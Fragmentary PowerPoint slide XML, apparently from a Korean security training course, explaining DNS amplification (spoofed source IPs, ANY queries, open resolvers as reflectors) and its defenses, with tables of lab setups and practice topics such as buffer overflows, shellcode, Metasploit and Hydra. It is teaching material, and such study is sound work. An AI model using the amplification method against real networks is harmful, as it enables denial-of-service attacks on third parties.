          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751240" y="6048623"/>
            <a:ext cx="7458075" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165392840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쿼리의 타입</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106A686F-8AAA-433A-910E-08D55BE48F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="709321" y="2017350"/>
            <a:ext cx="4791075" cy="3362325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692509E1-0514-4519-93EE-036E3E468D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5861277" y="2036400"/>
            <a:ext cx="5400675" cy="3343275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68699342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증폭 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(DNS Amplification)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Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C31125-175B-41E5-8957-CB9F98BCE6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971" y="2269671"/>
            <a:ext cx="4751547" cy="32666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9374DDD-7E51-4429-84D0-B1ED0D28412F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772150" y="2204357"/>
            <a:ext cx="5821587" cy="419377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dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 이용한 트래픽 증폭 공격이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>출발지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변조를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>통해 공격지로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>response data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 트래픽을 향하게 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>질의에 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인증 절차가 없기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>때문에 변조가 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>마치 거울에 반사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>하듯이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 공격 하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DRDOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>종류</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 과정에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타입의 쿼리를 이용하여 트래픽이 증폭 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격자 입장에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, Open DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 모두 좀비 피씨인 셈으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>효율적인 공격이 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2562031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/Environ</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>환경</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2846182976"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3290207" y="2813240"/>
          <a:ext cx="4612822" cy="2216785"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1842745">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2770077">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Python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파이썬 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WindowUpdate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윈도우 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>업데이트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WSL2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WSL2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>WSL2(command)</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WSL2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>설치</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>명령어</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232692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Docker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WSL2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>도커</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 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VMware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VMware </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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HackerSchool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해커스쿨 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>FTZ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>구축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3968394"/>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WSLOfflinePackageInstall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오프라인</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패키지 설치 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(bgpdump)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5632060"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9725DE0-8961-4F8D-81F5-BBC178C1426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2004C224-1AF2-438D-BFE0-E4B4D70035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4810B14-B5D5-4522-A733-71785F05EB2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1" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC3DAB6-F755-4CFD-B426-254063AC384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0134250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증폭 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(DNS Amplification)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Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C31125-175B-41E5-8957-CB9F98BCE6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971" y="2269671"/>
            <a:ext cx="4751547" cy="32666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9374DDD-7E51-4429-84D0-B1ED0D28412F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772150" y="2029898"/>
            <a:ext cx="5821587" cy="460927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dirty="0"/>
              <a:t>방어방법은 다양하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버에서 재귀를 할 수 없도록 설정한다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>도메인 정보가 없는 질의에 대해 응답을 못 할 수도 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>resolve.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일에 외부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>등록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리를 못하게 설정한다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 변조 필터링 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(syn-cookie mechanism) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>보안장비를 배치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방화벽 설정을 통해 특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이상의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>응답을 차단한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>매 초마다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿼리의 제한을 둔다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>내부 사용자의 주소만 재귀 쿼리를 허용한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235354293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br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실습</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2551738653"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4040064" y="2936367"/>
          <a:ext cx="3288306" cy="1477773"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="791154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1248576">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1248576">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="82128855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Unit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사이버전 실습체계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단위과제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46381">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>Scenario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A&amp;D</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FTZ</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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>해커스쿨 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>FTZ</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5062878"/>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WHK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ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>웹해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                        <a:t>kr</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0328073"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2946CB6B-4B9C-485B-A290-AD01CEDB401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82968D09-2972-47D4-B2E8-9163AC47429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2BD5A112-97FB-4F71-BDE4-D670C3E8064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AB77FE37-EF96-4AE5-8A9F-74D7CBC03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5E9203A2-41EF-420E-B6D7-CEAA622DB0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990740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br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>단위과제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2082340209"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3112936" y="2690177"/>
          <a:ext cx="4932459" cy="1477645"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="446310">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2841996">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1644153">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Sys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System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Net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Network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Malware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Cip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Cipher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5662576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124767760"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1814222" y="1953081"/>
          <a:ext cx="8563556" cy="3932054"/>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R-</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7"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8"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9"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FTP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서비스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0"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복귀주소 조작</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1"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쉘코드</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실행</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2"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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>BOF</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3"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Format String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4"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권한상승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5"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Metasploit</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6"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비인가 접근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Hydra</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문제 리스트</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="화살표: 오른쪽 4">
            <a:hlinkClick r:id="rId17"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2A19F8D-1F6A-483B-9443-26C29EFC370B}"/>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3D9BA9BC-6AB6-4B07-A482-5F00A1B8CF9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17EFC9C-F8E0-49B7-8987-6E7875D2D2E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8" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADBB95B8-D9E7-40CF-946E-58CE87AB900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4752173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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 218">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1786AD2-BA00-48D3-80AD-6000488CA370}"/>
              </a:ext>
            </a:extLst>
